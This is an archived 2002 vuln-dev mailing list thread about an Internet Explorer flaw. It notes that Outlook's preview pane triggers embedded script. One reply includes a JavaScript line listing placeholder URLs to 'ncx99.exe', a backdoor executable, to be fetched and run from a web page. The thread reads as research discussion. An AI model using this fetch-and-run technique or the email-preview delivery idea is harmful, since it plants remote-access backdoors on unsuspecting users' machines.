Vulnerability Development mailing list archives
RE: Rather large MSIE-hole
From: "Chad Thunberg" <chadth () nologin org>
Date: Thu, 14 Mar 2002 22:35:58 -0800
This is not limited to a user visiting a webpage. Outlook and Outlook Express execute client-side code in email per the IE settings assigned. A user doesn't even have to open the HTML-formatted email with the JS or this XML code embedded if they are using a preview pane.

Also, if you look at the codebase and the functions surrounding it, you will realize that passing additional parameters separated by any type of space will not work. However, using this in conjunction with other methods and transports can be very powerful.

-Chad

-----Original Message-----
From: KF [mailto:dotslash () snosoft com]
Sent: Thursday, March 14, 2002 2:48 PM
To: vuln-dev () security-focus com
Subject: Re: Rather large MSIE-hole

Another thought... will this bug run an executable from a web page? If so you could just make your own binary to do whatever you wanted. Like http://mysiteathome.com/malware.exe or something along those lines. I would HOPE that it asks to save the file to disk or, even better, ignores it altogether. Maybe try something like:

var programName=new Array( 'http://mysiteathome.com/ncx99.exe', 'http://someothersite.com/ncx99.exe', );

I would do this myself but I don't have any Windows boxen to test.

-KF

Paul D. Campbell wrote:

Could you not create a batch file that housed the commands you wanted to run (with args) and just run the batch file? I apologise if someone has already addressed this.

-Eric

You would probably be able to do this. However, you would first need to place the batch file on the target machine. Then you would have to sit around and hope the user visits your malicious site. Though, if you have the capability to write to someone's hard drive you could do something much nastier than this :)

Paul